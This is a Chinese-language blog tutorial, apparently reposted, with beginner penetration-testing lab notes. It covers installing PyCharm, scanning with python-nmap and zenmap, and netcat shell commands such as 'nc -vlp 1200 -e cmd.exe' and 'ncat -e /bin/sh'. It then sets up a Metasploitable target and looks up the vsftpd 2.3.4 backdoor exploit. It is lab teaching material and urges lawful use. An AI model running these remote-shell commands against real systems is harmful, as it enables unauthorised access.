码迷,mamicode.com
首页 > Web开发 > 详细

7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境

时间:2019-08-04 01:47:21      阅读:265      评论:0      收藏:0      [点我收藏+]

标签:com   获取   地址   sudo   table   his   vsftp   vsftpd   --help   

安装pycharm

www.jetbrains.com/pycharm/
tar -zxvf p补全
ls
cd p补全
ls
cd bin
ls
./pycharm.sh

新建项目 pythonRocks.py
print "python Rocks"

cd Desktop
ls
chmod +x pythonRocks.py
ls
python pythonRocks.py

导入Nmap模块

cd Desktop
pip install python-nmap
  • 从网站的方式下载模块
pypi.python.org/pypi
索引 nmap
解压   打开终端
cd python-nmap-0.6.1/
ls
cd python-nmap-0.6.1/
ls
python setup.py install

打开pycharm 新建项目 nmap_Test

improt nmap
nmap1 =nmap.PortScanner()

a = nmap1.nmap_version()

print(a)
ls
python nmap_Test.py
nmap -v

netcat反向shell

ncat
nc --help
nc -help
windows:cd Desktop
nc -vlp 1200
linux:nc - vv windowsIP地址 1200
hello,this it a test message.
windows:hello,it is me.
linux:退出nc

windows:nc -help
nc -vlp 1200 -e cmd.exe
linux:nc - vv windowsIP地址 1200
nc -vlp 1200 -e /bin/sh
ncat -e /bin/sh 1200
sudo bash
apt-get install nmap
ncat -e /bin/sh -vlp 1200 
windows:nc -vv linuxIP地址 1200

metasploitable

服务器端攻击,这些IP一般不会变,域名如facebook.com
ping www.facebook.com
下载靶机metasploitable到虚拟机

  • 在靶机中的所有实验和现实情况是一模一样的,请大家一定要遵守法律。
  • 不得打着没有实战的口号,进行正式站点的实战尝试。
    ** 你会发现带有网络web功能的靶机在浏览器里显示内容。
    ** 它是没有安全性功能的靶机,更方便用于原理学习,帮助你更好的验证红队技术。
    ** 正相反,实际站点的安全性非常丰富,防御组件繁多,更不利于学习和掌握核心技术。
    ** 因此,综合所有原因。靶机才是最实际的实战方式,可以测试你所有技术。

  • 例子为parrot发行版

确保靶机网络设置为NAT
不管是服务器渗透还是客户端渗透,先拿到目标IP地址
靶机:ifconfig
parrot:浏览器     输入靶机IP
我们的目标是收集信息,收集靶机中的关于服务器的信息
你可以使用zenmap和nmap在图形化工具与命令行工具中灵活切换
打开zenmap 输入靶机IP地址  选择强烈扫描    下面就会显示生成命令行
会看见打开了很多服务与端口

ssh msfadmin@靶机IP
是否使用RSA密钥选择yes
默认密码 msfadmin
clear    ls    ifconfig    whoami    uname -r    logout

查看zenmap扫描结果信息
谷歌 vsftpd 2.3.4 exploits    得到这个模块是一个获取后门的模块
parrot:msfconsole

技术图片
技术图片

再次声明:过分的体现红队信息,真正受益者是用户和蓝队。

如果您不看见,就不会注意版本信息,也就不会重视升级与更新。

随着时间的推移,攻击您的不是初学者,而是更高级别的国际犯罪者。

7.安装pycharm----导入Nmap模块----netcat反向shell----metasploitable靶机环境

标签:com   获取   地址   sudo   table   his   vsftp   vsftpd   --help   

原文地址:https://www.cnblogs.com/sec875/p/11296859.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!